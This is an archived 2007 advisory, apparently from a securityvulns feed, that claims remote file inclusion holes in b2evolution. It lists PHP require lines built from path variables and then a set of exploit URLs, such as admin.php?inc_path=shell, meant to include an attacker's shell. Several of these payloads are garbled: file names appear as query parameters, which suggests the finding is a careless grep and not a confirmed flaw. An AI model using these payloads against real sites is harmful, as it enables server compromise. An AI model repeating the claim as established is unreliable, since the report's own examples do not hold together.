Remote File Inclusion

2007-04-28T00:00:00
ID SECURITYVULNS:DOC:16868
Type securityvulns
Reporter Securityvulns
Modified 2007-04-28T00:00:00

Description

b2evolution Remote File Inclusion

Affected Software .: b2evolution # Download..: http://b2evolution.net/ # Risk ..............: high # Date .........: 25/4/2007 # Found by ..........: s433d_only_linux # Contact ...........: s433d_only_linux@yahoo.de # Web .............: Www.hackerz.ir # special thanx ........... Ali Jasbi my beste friend#

Affected File: b2evolution\blogs/a_noskin.php require $inc_path.'_blog_main.inc.php'; b2evolution\blogs/a_stub.php require $inc_path.'_blog_main.inc.php'; b2evolution\blogs/admin.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/admin.php require $view_path.'errors/_access_denied.inc.php'; b2evolution\blogs/admin.php require_once $inc_path.'_async.inc.php'; b2evolution\blogs/admin.php require $control_path.$ctrl_mappings[$ctrl]; b2evolution\blogs/contact.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/contact.php require $skins_path.'_msgform.php'; b2evolution\blogs/default.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/index.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/index.php require $inc_path.'_blog_main.inc.php'; b2evolution\blogs/multiblogs.php require_once $inc_path.'_blog_main.inc.php'; b2evolution\blogs/multiblogs.php require $skins_path.'_bloglist.php'; b2evolution\blogs/multiblogs.php require $skins_path.'_feedback.php';

b2evolution\blogs/a_noskin.php?require=shell? b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell? b2evolution\blogs/admin.php?inc_path= b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell? b2evolution\blogs/admin.php?inc_path=shell